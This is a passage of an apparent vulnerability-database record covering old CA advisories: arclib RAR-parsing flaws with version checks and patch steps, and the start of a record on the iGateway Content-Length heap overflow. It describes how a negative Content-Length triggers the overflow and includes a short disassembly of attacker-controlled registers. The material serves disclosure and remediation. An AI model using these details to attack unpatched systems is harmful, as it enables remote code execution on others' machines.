Windows:\n\n1. Using Windows Explorer, locate the file \"arclib.dll\". By \n default, the file is located in the \n \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" directory (*). \n2. Right click on the file and select Properties. \n3. Select the Version tab. \n4. If the file version is earlier than indicated below, the \n installation is vulnerable. \n\n File Name File Version\n arclib.dll 8.1.4.0\n\n*For eTrust Intrusion Detection 2.0, the file is located in \n\"Program Files\\eTrust\\Intrusion Detection\\Common\", and for eTrust \nIntrusion Detection 3.0 and 3.0 sp1, the file is located in \n\"Program Files\\CA\\Intrusion Detection\\Common\". \n\nFor CA Anti-Virus r8.1 on non-Windows platforms:\n\nUse the compver utility provided on the CD to determine the \nversion of Arclib. If the version is less than 8.1.4.0, the \ninstallation is vulnerable. \n\nExample compver utility output:\n\n ------------------------------------------------\n COMPONENT NAME VERSION\n ------------------------------------------------\n eTrust Antivirus Arclib Archive Library 8.1.4.0\n ... (followed by other components)\n \n\nFor reference, the following are file names for arclib on \nnon-Windows operating systems:\n\n Operating System File name\n Solaris libarclib.so\n Linux libarclib.so\n Mac OS X arclib.bundle\n\n\nSolution\n\nCA released arclib 8.1.4.0 on August 12 2009. If your product is \nconfigured for automatic updates, you should already be protected, \nand you need to take no action. If your product is not configured \nfor automatic updates, then you simply need to run the update \nutility included with your product. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.0: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r3.1: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11: apply fix # RO11964. \n\nCA Network and Systems Management (NSM) (formerly Unicenter \nNetwork and Systems Management) r11.1: apply fix # RO11964. \n\nCA Common Services (CCS) r3.1: apply fix # RO11954. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \n32bit: apply fix # RO10663. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nIA64: apply fix # RO10664. \n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 \nAMD64: apply fix # RO10665. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr1.1: apply fix # RO10999. \n\nCA Secure Content Manager (formerly eTrust Secure Content Manager) \nr8.0: apply fix # RO10999. \n\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: \napply fix # RO11000. \n\nCA Gateway Security r8.1: RO10999. \n\nCA ARCserve for Windows Server component installed on a 64 bit \nmachine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 \n(AMD64). \n\nCA ARCserve for Windows Server component installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Windows Client Agent installed on a 64 bit \nmachine: apply fix # RO10664 (IA64) or RO10665 (AMD64). \n\nCA ARCserve for Windows Client Agent installed on a 32 bit \nmachine: apply fix # RO10663. \n\nCA ARCserve for Linux Server r11.5: apply fix # RO10729. \n\nCA ARCserve for Linux:\n\n1. Download RO10729.tar.Z from RO10729 into a temporary location \n /tmp/RO10729\n\n2. Uncompress and untar RO10729.tar.Z as follows:\n uncompress RO10729.tar.Z\n tar -xvf RO10729.tar\n The new \"libarclib.so\" will be extracted to /tmp/RO10729\n\n3. Change the directory to $CAIGLBL0000/ino/config as follows:\n cd $CAIGLBL0000/ino/config\n\n4. Rename \"libarclib.so\" to \"libarclib.so.RO10729\" as follows:\n mv libarclib.so libarclib.so.RO10729\n\n5. Copy the new libarclib.so as follows:\n cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/\n\n6. chmod +x $CAIGLBL0000/ino/config/libarclib.so\n\n7. Stop the common agent (caagent stop)\n\n8. Change the directory to ARCserve common agent directory \n (typically /opt/CA/BABcmagt)\n cd /opt/CA/BABcmagt\n Note: To find out the agent home directory run the following \n command:\n dirname \u0027ls -l /usr/bin/caagent |cut -f2 -d\"\u003e\"\u0027\n\n9. Save a copy of libarclib.so\n cp -p libarclib.so libarclib.so.RO10729\n\n10. Copy over the new libarclib.so as follows:\n cp $/tmp/RO10729/libarclib.so. \n\n11. Start the common agent (caagent start)\n\n12. Repeat steps (7-11) on all remote Linux client agents\u0027 \n installations. \n\n13. rm -rf /tmp/RO10729\n\n\nWorkaround\n\nDo not open email attachments or download files from untrusted \nsources. \n\n\nIf additional information is required, please contact CA Support \nat http://support.ca.com/. \n\n\nIf you discover a vulnerability in CA products, please report your \nfindings to the CA Product Vulnerability Response Team. \nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\n\n\nRegards,\nKen Williams, Director ; 0xE2941985\nCA Product Vulnerability Response Team\n\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia. \n\nFor more information visit:\nhttp://secunia.com/advisories/business_solutions/\n\nAlternatively request a call from a Secunia representative today to\ndiscuss how we can help you with our capabilities contact us at:\nsales@secunia.com\n\n----------------------------------------------------------------------\n\nTITLE:\nCA Anti-Virus Engine RAR Processing Two Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA36976\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/36976/\n\nDESCRIPTION:\nTwo vulnerabilities have been reported in multiple CA products, which\ncan be exploited by malicious people to cause a DoS (Denial of\nService) or to potentially compromise a vulnerable system. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nPlease see the vendor\u0027s advisory for detailed instructions on\napplying patches. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Thierry Zoller. \n\nORIGINAL ADVISORY:\nCA20091008-01:\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Background\n~~~~~~~~~~~~~\nQuote: \n\"CA is one of the world\u0027s largest IT management software providers. \nWe serve more than 99% of Fortune 1000 companies, as well as government \nentities, educational institutions and thousands of other companies \nin diverse industries worldwide\" \n\n\"CA Anti-Virus for the Enterprise is the next generation in comprehensive \nanti-virus security for business PCs, servers and PDAs. It combines \nproactive protection against malware with new, powerful management \nfeatures that stop and remove malicious code before it enters your \nnetwork, reducing system downtime\"\n\n\nII. \n\nAttacker has control over EBX :\n\nBasic Block:\n 6e4305b0 mov cl,byte ptr [ebx]\n Tainted Input Operands: ebx\n 6e4305b2 add edi,28h\n 6e4305b5 push edi\n 6e4305b6 lea edx,[esp+14h]\n 6e4305ba mov byte ptr [esp+14h],cl\n Tainted Input Operands: cl\n 6e4305be inc ebx\n Tainted Input Operands: ebx\n 6e4305bf push edx\n 6e4305c0 mov ecx,esi\n 6e4305c2 mov dword ptr [esp+1ch],ebx\n Tainted Input Operands: ebx\n 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)\n \n \n\nIII. \nDue to the nature of Anti-virus products, the attack vectors can be near endless. An attack\ncould be done over the way of an E-mail message carrying an RAR attachment (of a file\nrecognised as being RAR), USB, CD, Network data etc. \n\nPlease note that this is a general problem and not exclusive to Computer Associates. \n\n\nIV. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD.MM.YYYY\n11.05.2009 - Reported CVE-2009-3587 \n03.06.2009 - Reported CVE-2009-3588\n09.10.2009 - CA releases advisory\nhttps://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878\n13.10.2009 - G-SEC releases advisory\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3588"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-3588",
"trust": 3.0
},
{
"db": "BID",
"id": "36653",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "36976",
"trust": 2.6
},
{
"db": "VUPEN",
"id": "ADV-2009-2852",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1022999",
"trust": 2.5
},
{
"db": "XF",
"id": "53698",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-41034",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81918",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81885",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "81986",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"id": "VAR-200910-0097",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T20:18:48Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "218878",
"trust": 0.8,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/36653"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1022999"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/36976"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2009/2852"
},
{
"trust": 2.2,
"url": "http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=218878"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/507068/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53698"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3588"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/53698"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3588"
},
{
"trust": 0.4,
"url": "http://blog.g-sec.lu/2009/10/computer-associates-multiple-products.html"
},
{
"trust": 0.4,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/507101"
},
{
"trust": 0.3,
"url": "/archive/1/507068"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3587"
},
{
"trust": 0.1,
"url": "http://support.ca.com/."
},
{
"trust": 0.1,
"url": "https://www.g-sec.lu"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/36976/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "PACKETSTORM",
"id": "81885"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-10-13T00:00:00",
"db": "VULHUB",
"id": "VHN-41034"
},
{
"date": "2009-10-09T00:00:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"date": "2009-10-12T20:41:50",
"db": "PACKETSTORM",
"id": "81918"
},
{
"date": "2009-10-12T11:21:41",
"db": "PACKETSTORM",
"id": "81885"
},
{
"date": "2009-10-14T23:09:22",
"db": "PACKETSTORM",
"id": "81986"
},
{
"date": "2009-10-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"date": "2009-10-13T10:30:00.627000",
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-41034"
},
{
"date": "2009-10-13T15:38:00",
"db": "BID",
"id": "36653"
},
{
"date": "2010-12-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "81918"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural CA Product Anti-Virus In the engine arclib Service disruption in components (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 0.6
}
}
VAR-200512-0273
Vulnerability from variot - Updated: 2025-04-03 22:39Heap-based buffer overflow in the iGateway service for various Computer Associates (CA) iTechnology products, in iTechnology iGateway before 4.0.051230, allows remote attackers to execute arbitrary code via an HTTP request with a negative Content-Length field. The attacker can trigger the vulnerability by supplying a negative HTTP Content-Length value and a large URI to the service. A successful attack can result in corrupting process memory and the execution of arbitrary code with SYSTEM privileges on Windows platforms. The vendor has reported that this issue triggers only a denial-of-service condition on other platforms. Products containing iGateway 4.0.051230 are vulnerable to this issue. iTechnology is an integrated technology that provides standard Web service interfaces for third-party products. There is a heap overflow vulnerability in iTechnology's processing of HTTP request headers. iGateway service monitors standard HTTP or SSL communication on port 5250. The service does not properly handle negative HTTP Content-Length fields. iGateway parses the Content-length field value of the HTTP request and uses this value directly in the malloc() heap allocation call, so if a negative value is provided, the heap allocation call will return a small buffer. After the malloc() call, memcpy the provided URI to the allocated buffer and overwrite it to the heap.
TITLE: CA Products iGateway Service Content-Length Buffer Overflow
SECUNIA ADVISORY ID: SA18591
VERIFY ADVISORY: http://secunia.com/advisories/18591/
CRITICAL: Moderately critical
IMPACT: System access
WHERE:
From local network
SOFTWARE: BrightStor ARCserve Backup 11.x http://secunia.com/product/312/ BrightStor ARCserve Backup 11.x (for Windows) http://secunia.com/product/3099/ BrightStor ARCserve Backup 9.x http://secunia.com/product/313/ BrightStor ARCserve Backup for Laptops & Desktops 11.x http://secunia.com/product/5906/ BrightStor Enterprise Backup 10.x http://secunia.com/product/314/ BrightStor Process Automation Manager 11.x http://secunia.com/product/5908/ BrightStor Storage Resource Manager 11.x http://secunia.com/product/5909/ BrightStor Storage Resource Manager 6.x http://secunia.com/product/5910/ CA Advantage Data Transformer 2.x http://secunia.com/product/5904/ CA AllFusion Harvest Change Manager 7.x http://secunia.com/product/5905/ CA BrightStor Portal 11.x http://secunia.com/product/5577/ CA BrightStor SAN Manager 11.x http://secunia.com/product/5576/ CA eTrust Admin 8.x http://secunia.com/product/5584/ CA eTrust Audit 1.x http://secunia.com/product/5911/ CA eTrust Audit 8.x http://secunia.com/product/5912/ CA eTrust Identity Minder 8.x http://secunia.com/product/5913/ CA Unicenter Service Fulfillment 2.x http://secunia.com/product/5942/ eTrust Secure Content Manager (SCM) http://secunia.com/product/3391/
DESCRIPTION: Erika Mendoza has reported a vulnerability in various CA products, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to a boundary error in the handling of HTTP data in the iGateway component.
SOLUTION: Update the iGateway component to version 4.0.051230 or later. ftp://ftp.ca.com/pub/iTech/downloads/
PROVIDED AND/OR DISCOVERED BY: Erika Mendoza
ORIGINAL ADVISORY: Computer Associates: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778
iDEFENSE: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Please see below for important changes to CAID 33778 (aka CVE-2005-3653; OSVDB 22688; X-Force 24269; SecurityTracker Alert ID 1015526). Changelog is near end of advisory.
Regards, Ken Williams
Title: CAID 33778 - CA iGateway Content-Length Buffer Overflow Vulnerability [v1.1]
CA Vulnerability ID: 33778
CA Advisory Date: 2006-01-23 Updated Advisory [v1.1]: 2006-01-26
Discovered By: Erika Mendoza reported this issue to iDefense.
Mitigating Factors: None.
Severity: CA has given this vulnerability a Medium risk rating.
Affected Technologies: Please note that the iGateway component is not a product, but rather a common component that is included with multiple products. The iGateway component is included in the following CA products, which are consequently potentially vulnerable.
Affected Products:
BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup for Windows r11 BrightStor Enterprise Backup 10.5 BrightStor ARCserve Backup v9.01 BrightStor ARCserve Backup Laptop & Desktop r11.1 BrightStor ARCserve Backup Laptop & Desktop r11 BrightStor Process Automation Manager r11.1 BrightStor SAN Manager r11.1 BrightStor SAN Manager r11.5 BrightStor Storage Resource Manager r11.5 BrightStor Storage Resource Manager r11.1 BrightStor Storage Resource Manager 6.4 BrightStor Storage Resource Manager 6.3 BrightStor Portal 11.1
Note to BrightStor Storage Resource Manager and BrightStor Portal users: In addition to the application servers where these products are installed, all hosts that have iSponsors deployed to them for managing applications like Veritas Volume Manager and Tivoli TSM are also affected by this vulnerability.
eTrust Products: eTrust Audit 1.5 SP2 (iRecorders and ARIES) eTrust Audit 1.5 SP3 (iRecorders and ARIES) eTrust Audit 8.0 (iRecorders and ARIES) eTrust Admin 8.1 eTrust Identity Minder 8.0 eTrust Secure Content Manager (SCM) R8 eTrust Integrated Threat Management (ITM) R8 eTrust Directory, R8.1 (Web Components Only)
Unicenter Products: Unicenter CA Web Services Distributed Management R11 Unicenter AutoSys JM R11 Unicenter Management for WebLogic / Management for WebSphere R11 Unicenter Service Delivery R11 Unicenter Service Level Management (USLM) R11 Unicenter Application Performance Monitor R11 Unicenter Service Desk R11 Unicenter Service Desk Knowledge Tools R11 Unicenter Asset Portfolio Management R11 Unicenter Service Metric Analysis R11 Unicenter Service Catalog/Assure/Accounting R11 Unicenter MQ Management R11 Unicenter Application Server Management R11 Unicenter Web Server Management R11 Unicenter Exchange Management R11
Affected platforms: AIX, HP-UX, Linux Intel, Solaris, and Windows
Status and Recommendation: Customers with vulnerable versions of the iGateway component should upgrade to the current version of iGateway (4.0.051230 or later), which is available for download from the following locations: http://supportconnect.ca.com/ ftp://ftp.ca.com/pub/iTech/downloads/
Determining the version of iGateway: To determine the version numbers of the iGateway components:
Go to the igateway directory:
On windows, this is %IGW_LOC% Default path for v3.: C:\Program Files\CA\igateway Default path for v4.: C:\Program Files\CA\SharedComponents\iTechnology
On unix, Default path for v3.: /opt/CA/igateway Default path for v4.: the install directory path is contained in opt/CA/SharedComponents/iTechnology.location. The default path is /opt/CA/SharedComponents/iTechnology
Look at the element in igateway.conf.
The versions are affected by this vulnerability if you see a value LESS THAN the following: 4.0.051230 (note the format of v.s.YYMMDD)
References: (note that URLs may wrap) CA SupportConnect: http://supportconnect.ca.com/ http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not ice.asp
CAID: 33778 CAID Advisory link: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778
CVE Reference: CVE-2005-3653 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653
OSVDB Reference: OSVDB-22688 http://osvdb.org/22688
iDefense Reference: Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376
Changelog: v1.0 - Initial Release v1.1 - Removed several unaffected technologies; added more reference links.
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln@ca.com, or contact me directly.
If you discover a vulnerability in CA products, please report your findings to vuln@ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Dir. of CA Vulnerability Research Team
CA, One Computer Associates Plaza. Islandia, NY 11749
Contact http://www3.ca.com/contact/ Legal Notice http://ca.com/calegal.htm Privacy Policy http://www.ca.com/caprivacy.htm Copyright 2006 CA. All rights reserved
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.0"
},
{
"_id": null,
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11"
},
{
"_id": null,
"model": "etrust directory",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1_web_components"
},
{
"_id": null,
"model": "unicenter application server managment",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "brightstor process automation manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "unicenter service catalog fulfillment accounting",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "unicenter service desk knowledge tools",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "unicenter autosys jm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "10.5"
},
{
"_id": null,
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "10.0"
},
{
"_id": null,
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "unicenter web server management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"_id": null,
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"_id": null,
"model": "unicenter web services distributed management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"_id": null,
"model": "unicenter service metric analysis",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "etrust audit aries",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.5"
},
{
"_id": null,
"model": "etrust audit irecorder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"_id": null,
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"_id": null,
"model": "unicenter service fulfillment",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "unicenter service fulfillment",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"_id": null,
"model": "unicenter asset portfolio management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"_id": null,
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"_id": null,
"model": "etrust audit aries",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "etrust audit irecorder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "unicenter ca web services distributed management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"_id": null,
"model": "etrust identity minder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"_id": null,
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"_id": null,
"model": "itechnology igateway",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
